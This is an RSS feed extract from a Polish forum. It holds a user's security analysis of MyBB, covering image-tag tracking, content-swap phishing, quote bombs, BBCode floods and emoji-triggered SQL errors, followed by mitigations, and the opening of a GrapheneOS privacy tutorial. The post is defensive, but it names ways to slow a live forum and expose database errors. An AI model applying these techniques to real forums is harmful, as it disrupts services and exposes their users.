/>•&nbsp;Limit&nbsp;głębokości&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">quote</span><span style="color: #007700">]:&nbsp;</span><span style="color: #0000BB">max&nbsp;quote&nbsp;depth&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">10 <br />•&nbsp;Limit&nbsp;sygnatur</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">1–2&nbsp;obrazki <br />•&nbsp;Image&nbsp;proxy&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">cache <br />•&nbsp;Whitelist&nbsp;hostów <br />•&nbsp;Wyłączenie&nbsp;HTML&nbsp;dla&nbsp;użytkowników <br />•&nbsp;Blokowanie&nbsp;dużych&nbsp;GIF <br />•&nbsp;Logowanie&nbsp;błędów&nbsp;zamiast&nbsp;pokazywania&nbsp;szczegółowych&nbsp;zapytań&nbsp;SQL<br /><br />·&nbsp;Limit&nbsp;załączników&nbsp;został&nbsp;poprawiony&nbsp;ale&nbsp;też&nbsp;można&nbsp;było&nbsp;się&nbsp;nadziać&nbsp;na&nbsp;duże&nbsp;bomby&nbsp;plików</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">gdyby&nbsp;ktoś&nbsp;wykorzystał</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">6.&nbsp;Rekomendacje&nbsp;dla&nbsp;technika<br />•&nbsp;Zmiana&nbsp;bazy&nbsp;na&nbsp;utf8mb4&nbsp;aby&nbsp;obsłużyć&nbsp;emoji <br />•&nbsp;Włączenie&nbsp;logów&nbsp;zamiast&nbsp;pokazywania&nbsp;błędów&nbsp;SQL <br />•&nbsp;Ograniczenie&nbsp;liczby&nbsp;obrazów&nbsp;i&nbsp;głębokości&nbsp;cytatów <br />•&nbsp;Cache&nbsp;i&nbsp;proxy&nbsp;dla&nbsp;zewnętrznych&nbsp;obrazów <br />•&nbsp;Archiwizacja&nbsp;obrazów&nbsp;wewnętrznych&nbsp;zamiast&nbsp;polegania&nbsp;na&nbsp;linkach&nbsp;zewnętrznych <br /><br />7.&nbsp;Podsumowanie<br />Problemy&nbsp;z&nbsp;</span><span style="color: #007700">[-</span><span style="color: #0000BB">img</span><span style="color: #007700">],&nbsp;[-</span><span style="color: #0000BB">quote</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">i&nbsp;emoji&nbsp;w&nbsp;MyBB&nbsp;nie&nbsp;są&nbsp;klasycznymi&nbsp;exploitami</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ale&nbsp;mogą</span><span style="color: #007700">:</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">ujawniać&nbsp;strukturę&nbsp;bazy&nbsp;SQL <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">spowalniać&nbsp;forum <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">umożliwiać&nbsp;śledzenie&nbsp;użytkowników <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">służyć&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">manipulacji&nbsp;treścią <br /><br />Zastosowanie&nbsp;powyższych&nbsp;limitów&nbsp;i&nbsp;pluginów&nbsp;znacząco&nbsp;poprawia&nbsp;bezpieczeństwo&nbsp;i&nbsp;wydajność&nbsp;forum</span><span style="color: #007700">.<br /></span><span style="color: #0000BB">Dużo&nbsp;już&nbsp;zostało&nbsp;poprawione&nbsp;po&nbsp;zgłoszeniach&nbsp;dlatego&nbsp;można&nbsp;zamieścić&nbsp;to&nbsp;w&nbsp;poście&nbsp;i&nbsp;nie&nbsp;wygląda&nbsp;to&nbsp;jako&nbsp;poradnik</span><span style="color: #007700">.&nbsp;<br /></span></code></div></div></div></div></div></div>
<hr class="mycode_hr" />
Poprawie i wkleje w <br />
<div class="codeblock phpcodeblock"><div class="title">Kod PHP:</div><div class="body"><div dir="ltr"><code><span style="color: #0000BB">Code&nbsp;<br /></span></code></div></div></div>zeby edytować i oznacze Moderator'a ale tera to nie mam siły na to.]]></description>
			<content:encoded><![CDATA[<div style="text-align: left;" class="mycode_align"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="color: #ffd700;" class="mycode_color">🔹 <span style="font-weight: bold;" class="mycode_b">Analiza bezpieczeństwa MyBB</span></span></span></span></div>
<br />
<br />
<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">1. Wprowadzenie</span></span></span></span><br />
<span style="font-size: small;" class="mycode_size">MyBB to popularne oprogramowanie forum, które pozwala wstawiać posty przy użyciu BBCode.  </span><br />
<span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #b3d5f4;" class="mycode_color">   </span></span></span><ul class="mycode_list"><li><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #b3d5f4;" class="mycode_color">Tag</span></span> -[-IMG] czyli obrazek wklejony i wyświetlany gdziekolwiek→ przeglądarka wysyła GET do serwera zewnętrznego.  </span><br />
</li>
</ul>
<br />
<span style="font-family: Trebuchet MS;" class="mycode_font"><span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff56ff;" class="mycode_color"><span style="font-size: large;" class="mycode_size">  ›</span></span></span><span style="font-size: x-small;" class="mycode_size">. </span></span><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Serwer może logować </span></span><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">IP, czas, user-agent i refere</span>r.</span></span></span><br />
<blockquote class="mycode_quote"><cite>Cytat:</cite><span style="font-size: small;" class="mycode_size">GET /picture.png HTTP/1.1  <br />
Host: example.com  <br />
User-Agent: Mozilla/5.0  <br />
Referer: <a href="https://forum.com/thread/123" target="_blank" rel="noopener" class="mycode_url">https://forum.com/thread/123</a></span></blockquote>
<span style="font-size: small;" class="mycode_size">Każdy obrazek jest więc zewnętrznym requestem, który może służyć do śledzenia aktywności użytkowników.</span><br />
<hr class="mycode_hr" />
<br />
<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">3. Typowe nadużycia</span></span></span></span><br />
<span style="font-size: small;" class="mycode_size"><span style="color: gold;" class="mycode_color">•</span> Content Switch Attack – zmiana obrazu po publikacji np. w poradniku.  <br />
<span style="color: gold;" class="mycode_color">•</span> External Resource Manipulation – podmiana obrazów w postach lub shoutboxie.  <br />
<span style="color: gold;" class="mycode_color">•</span> Mutable external content – dynamiczny content, np. phishing wizualny lub malware.</span><br />
<hr class="mycode_hr" />
<span style="font-size: small;" class="mycode_size"><br />
<span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #17b529;" class="mycode_color">🗼</span><span style="color: #17b529;" class="mycode_color"> » </span><span style="color: #e86e04;" class="mycode_color">Przykłady scenariuszy</span></span></span><br />
- Podmiana treści posta poprzez zmianę obrazu.  <br />
- Socjotechnika: fałszywe komunikaty typu "<span style="font-style: italic;" class="mycode_i">twoje konto wygasło</span>".  <br />
- Phishing wizualny i QR code malware.  <br />
- Tracking użytkowników: <span style="text-decoration: underline;" class="mycode_u">IP</span>, referer, user-agent.  <br />
- Pixel tracking: 1×1 obrazki.  <br />
- Fingerprinting przeglądarek.  <br />
- Wymuszone zapytania HTTP do serwera atakującego.  <br />
- Podmiana obrazów na treści nielegalne.</span><br />
<hr class="mycode_hr" />
<br />
<span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">4. Problemy techniczne MyBB</span></span></span><br />
<span style="color: gold;" class="mycode_color">•</span> SQL Error 1366 – baza ustawiona na utf8, a wstawione emoji (4 bajty) np. 🎖. </span><br />
<hr class="mycode_hr" />
<blockquote class="mycode_quote"><cite>Cytat:</cite>SQL Error: 1366 - Incorrect string value '\xF0\x9F\x8E\x96...' for column 'subject'</blockquote>
<span style="font-size: small;" class="mycode_size"><span style="color: gold;" class="mycode_color">•</span> Quote bomb – zbyt głęboko zagnieżdżone [quote] spowalnia parser i obciąża CPU.  <br />
<span style="color: gold;" class="mycode_color">•</span> Duże sygnatury / shoutbox – setki requestów HTTP dla obrazków.  <br />
<span style="color: gold;" class="mycode_color">•</span> Automatyczne embedowanie linków – linki do obrazów mogą omijać limit [img].  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> BBCode flood – ogromne posty z dziesiątkami zagnieżdżonych [quote] i [img] mogą obciążyć forum.</span>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<span style="font-size: small;" class="mycode_size">&lt;br /&gt;<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">5. Limity i zabezpieczenia</span></span></span>&lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Limit obrazów w poście: 5–15  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Limit głębokości [quote]: max quote depth = 10  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Limit sygnatur: 1–2 obrazki  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Image proxy / cache  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Whitelist hostów  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Wyłączenie HTML dla użytkowników  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Blokowanie dużych GIF  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Logowanie błędów zamiast pokazywania szczegółowych zapytań SQL</span>&lt;br /&gt;&lt;br /&gt;<span style="font-weight: bold;" class="mycode_b"><span style="color: #c19e00;" class="mycode_color"><span style="font-size: small;" class="mycode_size">·</span></span></span><span style="font-size: x-small;" class="mycode_size"> Limit załączników został poprawiony ale też można było się nadziać na duże bomby plików, gdyby ktoś wykorzystał.</span>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<span style="font-size: small;" class="mycode_size">&lt;br /&gt;<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">6. Rekomendacje dla technika</span></span></span>&lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Zmiana bazy na utf8mb4 aby obsłużyć emoji  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Włączenie logów zamiast pokazywania błędów SQL  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Ograniczenie liczby obrazów i głębokości cytatów  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Cache i proxy dla zewnętrznych obrazów  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Archiwizacja obrazów wewnętrznych zamiast polegania na linkach zewnętrznych </span>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<span style="font-size: small;" class="mycode_size">&lt;br /&gt;<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: small;" class="mycode_size">7. Podsumowanie</span></span></span></span>&lt;br /&gt;Problemy z [-img], [-quote] i emoji w MyBB <span style="font-weight: bold;" class="mycode_b">nie są klasycznymi exploitami</span>, ale mogą:  &lt;br /&gt;</span>&lt;br /&gt;<ul class="mycode_list"><li>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- ujawniać strukturę <span style="font-weight: bold;" class="mycode_b">bazy SQL  </span></span>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- <span style="font-style: italic;" class="mycode_i">spowalniać</span> forum  </span>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- umożliwiać <span style="text-decoration: underline;" class="mycode_u">śledzenie użytkowników</span>  </span>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- służyć do manipulacji treścią  </span>&lt;br /&gt;</li>
</ul>
&lt;br /&gt;&lt;br /&gt;<div style="text-align: right;" class="mycode_align"><span style="font-style: italic;" class="mycode_i"><span style="color: #ffdc00;" class="mycode_color"><span style="font-size: x-small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Zastosowanie powyższych limitów i pluginów znacząco poprawia bezpieczeństwo i wydajność forum.</span></span></span></span></div>&lt;br /&gt;<div style="text-align: right;" class="mycode_align"><span style="font-size: x-small;" class="mycode_size">Dużo już zostało poprawione po zgłoszeniach dlatego można zamieścić to w poście i nie wygląda to jako poradnik <img src="https://dopal.org/images/smilies/wink.png" alt="Wink" title="Wink" class="smilie smilie_2" /></span></div>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;Właśnie teraz wypierdziela mysql'a na stronie głównej.&lt;br /&gt;Dodaje post żeby technik mógł sprawdzić po godzinie logi później.&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<img src="https://gekkk.co/storage/v/e9ab2cdef3ed99dc9a2fef5c74a90ce0.png" loading="lazy"  alt="[Obrazek: e9ab2cdef3ed99dc9a2fef5c74a90ce0.png]" class="mycode_img" />[/size]<br />
<hr class="mycode_hr" />
<hr class="mycode_hr" />
oho to ładnie się porobiło, post mi edytowalo, ucięło i tryb widoku w edycji.<br />
<br />
Kopie se niżej dodałem...<br />
<br />
<div><div class="quotetitle"><input class="button2 btnlite spoiler" type="button" value="Zobacz spoiler"  onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';      this.innerText = ''; this.value = 'Ukryj spoiler'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Zobacz spoiler'; }" /></div><div class="quotecontent"><div style="display: none;">
<div class="codeblock phpcodeblock"><div class="title">Kod PHP:</div><div class="body"><div dir="ltr"><code><span style="color: #0000BB">🔹&nbsp;Analiza&nbsp;bezpieczeństwa&nbsp;MyBB<br /><br />1.&nbsp;Wprowadzenie<br />MyBB&nbsp;to&nbsp;popularne&nbsp;oprogramowanie&nbsp;forum</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">które&nbsp;pozwala&nbsp;wstawiać&nbsp;posty&nbsp;przy&nbsp;użyciu&nbsp;BBCode</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /> &nbsp; <br />Tag&nbsp;</span><span style="color: #007700">-[-</span><span style="color: #0000BB">IMG</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">czyli&nbsp;obrazek&nbsp;wklejony&nbsp;i&nbsp;wyświetlany&nbsp;gdziekolwiek→&nbsp;przeglądarka&nbsp;wysyła&nbsp;GET&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">serwera&nbsp;zewnętrznego</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /><br /> &nbsp;›</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">Serwer&nbsp;może&nbsp;logować&nbsp;IP</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">czas</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">user</span><span style="color: #007700">-</span><span style="color: #0000BB">agent&nbsp;i&nbsp;referer</span><span style="color: #007700">.<br /></span><span style="color: #0000BB">Cytat</span><span style="color: #007700">:<br /></span><span style="color: #0000BB">GET&nbsp;</span><span style="color: #007700">/</span><span style="color: #0000BB">picture</span><span style="color: #007700">.</span><span style="color: #0000BB">png&nbsp;HTTP</span><span style="color: #007700">/</span><span style="color: #0000BB">1.1 <br />Host</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">example</span><span style="color: #007700">.</span><span style="color: #0000BB">com <br />User</span><span style="color: #007700">-</span><span style="color: #0000BB">Agent</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">Mozilla</span><span style="color: #007700">/</span><span style="color: #0000BB">5.0 <br />Referer</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">https</span><span style="color: #007700">:</span><span style="color: #FF8000">//forum.com/thread/123<br /></span><span style="color: #0000BB">Każdy&nbsp;obrazek&nbsp;jest&nbsp;więc&nbsp;zewnętrznym&nbsp;requestem</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">który&nbsp;może&nbsp;służyć&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">śledzenia&nbsp;aktywności&nbsp;użytkowników</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">3.&nbsp;Typowe&nbsp;nadużycia<br />•&nbsp;Content&nbsp;</span><span style="color: #007700">Switch&nbsp;</span><span style="color: #0000BB">Attack&nbsp;–&nbsp;zmiana&nbsp;obrazu&nbsp;po&nbsp;publikacji&nbsp;np</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">w&nbsp;poradniku</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;External&nbsp;Resource&nbsp;Manipulation&nbsp;–&nbsp;podmiana&nbsp;obrazów&nbsp;w&nbsp;postach&nbsp;lub&nbsp;shoutboxie</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;Mutable&nbsp;external&nbsp;content&nbsp;–&nbsp;dynamiczny&nbsp;content</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">np</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">phishing&nbsp;wizualny&nbsp;lub&nbsp;malware</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">🗼&nbsp;»&nbsp;Przykłady&nbsp;scenariuszy<br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Podmiana&nbsp;treści&nbsp;posta&nbsp;poprzez&nbsp;zmianę&nbsp;obrazu</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Socjotechnika</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">fałszywe&nbsp;komunikaty&nbsp;typu&nbsp;</span><span style="color: #DD0000">"twoje&nbsp;konto&nbsp;wygasło"</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Phishing&nbsp;wizualny&nbsp;i&nbsp;QR&nbsp;code&nbsp;malware</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Tracking&nbsp;użytkowników</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">IP</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">referer</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">user</span><span style="color: #007700">-</span><span style="color: #0000BB">agent</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Pixel&nbsp;tracking</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">1×1&nbsp;obrazki</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Fingerprinting&nbsp;przeglądarek</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Wymuszone&nbsp;zapytania&nbsp;HTTP&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">serwera&nbsp;atakującego</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Podmiana&nbsp;obrazów&nbsp;na&nbsp;treści&nbsp;nielegalne</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">4.&nbsp;Problemy&nbsp;techniczne&nbsp;MyBB<br />•&nbsp;SQL&nbsp;Error&nbsp;1366&nbsp;–&nbsp;baza&nbsp;ustawiona&nbsp;na&nbsp;utf8</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">a&nbsp;wstawione&nbsp;emoji&nbsp;</span><span style="color: #007700">(</span><span style="color: #0000BB">4&nbsp;bajty</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">np</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">🎖</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />Cytat</span><span style="color: #007700">:<br /></span><span style="color: #0000BB">SQL&nbsp;Error</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">1366&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Incorrect&nbsp;string&nbsp;value&nbsp;</span><span style="color: #DD0000">'&#092;xF0&#092;x9F&#092;x8E&#092;x96...'&nbsp;</span><span style="color: #007700">for&nbsp;</span><span style="color: #0000BB">column&nbsp;</span><span style="color: #DD0000">'subject'<br /></span><span style="color: #0000BB">•&nbsp;Quote&nbsp;bomb&nbsp;–&nbsp;zbyt&nbsp;głęboko&nbsp;zagnieżdżone&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">quote</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">spowalnia&nbsp;parser&nbsp;i&nbsp;obciąża&nbsp;CPU</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;Duże&nbsp;sygnatury&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">shoutbox&nbsp;–&nbsp;setki&nbsp;requestów&nbsp;HTTP&nbsp;dla&nbsp;obrazków</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;Automatyczne&nbsp;embedowanie&nbsp;linków&nbsp;–&nbsp;linki&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">obrazów&nbsp;mogą&nbsp;omijać&nbsp;limit&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">img</span><span style="color: #007700">].</span><span style="color: #0000BB"> <br />•&nbsp;BBCode&nbsp;flood&nbsp;–&nbsp;ogromne&nbsp;posty&nbsp;z&nbsp;dziesiątkami&nbsp;zagnieżdżonych&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">quote</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">i&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">img</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">mogą&nbsp;obciążyć&nbsp;forum</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">5.&nbsp;Limity&nbsp;i&nbsp;zabezpieczenia<br />•&nbsp;Limit&nbsp;obrazów&nbsp;w&nbsp;poście</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">5–15 <br />•&nbsp;Limit&nbsp;głębokości&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">quote</span><span style="color: #007700">]:&nbsp;</span><span style="color: #0000BB">max&nbsp;quote&nbsp;depth&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">10 <br />•&nbsp;Limit&nbsp;sygnatur</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">1–2&nbsp;obrazki <br />•&nbsp;Image&nbsp;proxy&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">cache <br />•&nbsp;Whitelist&nbsp;hostów <br />•&nbsp;Wyłączenie&nbsp;HTML&nbsp;dla&nbsp;użytkowników <br />•&nbsp;Blokowanie&nbsp;dużych&nbsp;GIF <br />•&nbsp;Logowanie&nbsp;błędów&nbsp;zamiast&nbsp;pokazywania&nbsp;szczegółowych&nbsp;zapytań&nbsp;SQL<br /><br />·&nbsp;Limit&nbsp;załączników&nbsp;został&nbsp;poprawiony&nbsp;ale&nbsp;też&nbsp;można&nbsp;było&nbsp;się&nbsp;nadziać&nbsp;na&nbsp;duże&nbsp;bomby&nbsp;plików</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">gdyby&nbsp;ktoś&nbsp;wykorzystał</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">6.&nbsp;Rekomendacje&nbsp;dla&nbsp;technika<br />•&nbsp;Zmiana&nbsp;bazy&nbsp;na&nbsp;utf8mb4&nbsp;aby&nbsp;obsłużyć&nbsp;emoji <br />•&nbsp;Włączenie&nbsp;logów&nbsp;zamiast&nbsp;pokazywania&nbsp;błędów&nbsp;SQL <br />•&nbsp;Ograniczenie&nbsp;liczby&nbsp;obrazów&nbsp;i&nbsp;głębokości&nbsp;cytatów <br />•&nbsp;Cache&nbsp;i&nbsp;proxy&nbsp;dla&nbsp;zewnętrznych&nbsp;obrazów <br />•&nbsp;Archiwizacja&nbsp;obrazów&nbsp;wewnętrznych&nbsp;zamiast&nbsp;polegania&nbsp;na&nbsp;linkach&nbsp;zewnętrznych <br /><br />7.&nbsp;Podsumowanie<br />Problemy&nbsp;z&nbsp;</span><span style="color: #007700">[-</span><span style="color: #0000BB">img</span><span style="color: #007700">],&nbsp;[-</span><span style="color: #0000BB">quote</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">i&nbsp;emoji&nbsp;w&nbsp;MyBB&nbsp;nie&nbsp;są&nbsp;klasycznymi&nbsp;exploitami</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ale&nbsp;mogą</span><span style="color: #007700">:</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">ujawniać&nbsp;strukturę&nbsp;bazy&nbsp;SQL <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">spowalniać&nbsp;forum <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">umożliwiać&nbsp;śledzenie&nbsp;użytkowników <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">służyć&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">manipulacji&nbsp;treścią <br /><br />Zastosowanie&nbsp;powyższych&nbsp;limitów&nbsp;i&nbsp;pluginów&nbsp;znacząco&nbsp;poprawia&nbsp;bezpieczeństwo&nbsp;i&nbsp;wydajność&nbsp;forum</span><span style="color: #007700">.<br /></span><span style="color: #0000BB">Dużo&nbsp;już&nbsp;zostało&nbsp;poprawione&nbsp;po&nbsp;zgłoszeniach&nbsp;dlatego&nbsp;można&nbsp;zamieścić&nbsp;to&nbsp;w&nbsp;poście&nbsp;i&nbsp;nie&nbsp;wygląda&nbsp;to&nbsp;jako&nbsp;poradnik</span><span style="color: #007700">.&nbsp;<br /></span></code></div></div></div></div></div></div>
<hr class="mycode_hr" />
Poprawie i wkleje w <br />
<div class="codeblock phpcodeblock"><div class="title">Kod PHP:</div><div class="body"><div dir="ltr"><code><span style="color: #0000BB">Code&nbsp;<br /></span></code></div></div></div>zeby edytować i oznacze Moderator'a ale tera to nie mam siły na to.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[TUTORIAL] Prywatność totalna: GrapheneOS + Router LTE. Jak stać się „niewidzialnym”?]]></title>
			<link>https://dopal.org/showthread.php?tid=6284</link>
			<pubDate>Sat, 17 Jan 2026 07:16:06 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=1227">Hoxed</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=6284</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Witam! W tym tutorialu przyjrzymy się najbardziej bezpiecznej opcji, jeśli chodzi o smartfon – przynajmniej według mnie.</span><br />
<span style="font-weight: bold;" class="mycode_b">Na wstępie zaznaczę: bez wydania konkretnej kupy Gelda czy też PLN-ów się nie obejdzie. Nasz setup będzie pozbawiony funkcji dzwonienia na numer telefonu, ponieważ w samym smartfonie nigdy nie wyląduje karta SIM.</span><br />
<span style="font-weight: bold;" class="mycode_b">Połowa osób pewnie właśnie opluła ekrany, łapiąc się za głowę i pytając w myślach:</span><br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">"Co Ty, Hoxed, pierdolisz? Mam zapierdalać po mieście i szukać darmowych hotspotów, żeby odpisać na wiadomość?"</span></div>
<span style="font-weight: bold;" class="mycode_b">💡 Na czym polega plan?</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Cały misterny plan opiera się na tym, aby używać internetu z mobilnego routera na karty SIM (i to nie byle jakiego). W smartfonie z zainstalowanym systemem GrapheneOS nigdy nie używamy karty SIM, wyłączamy całkowicie usługi GPS i trzymamy się twardych zasad BHP pracy z takim urządzeniem.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">📱 Czym w ogóle jest GrapheneOS?</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">W największym skrócie: to system operacyjny bazujący na AOSP (Android Open Source Project). Jest to najbezpieczniejszy i najbardziej prywatny system mobilny dostępny dla zwykłego użytkownika.</span><br />
<span style="font-style: italic;" class="mycode_i">To nie jest "kolejny Custom ROM" do zabawy. To profesjonalny projekt stawiający na security hardening (utwardzanie bezpieczeństwa) i privacy by design. Nawet Edward Snowden przyznał, że sam z niego korzysta.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">🛡️ Najważniejsze funkcje (Killer Features):</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">• Całkowity brak Google (De-Googled): System domyślnie nie ma żadnych usług Google. Twój telefon nie wysyła w tle danych o Twojej lokalizacji czy aktywności na serwery korporacji.</span><br />
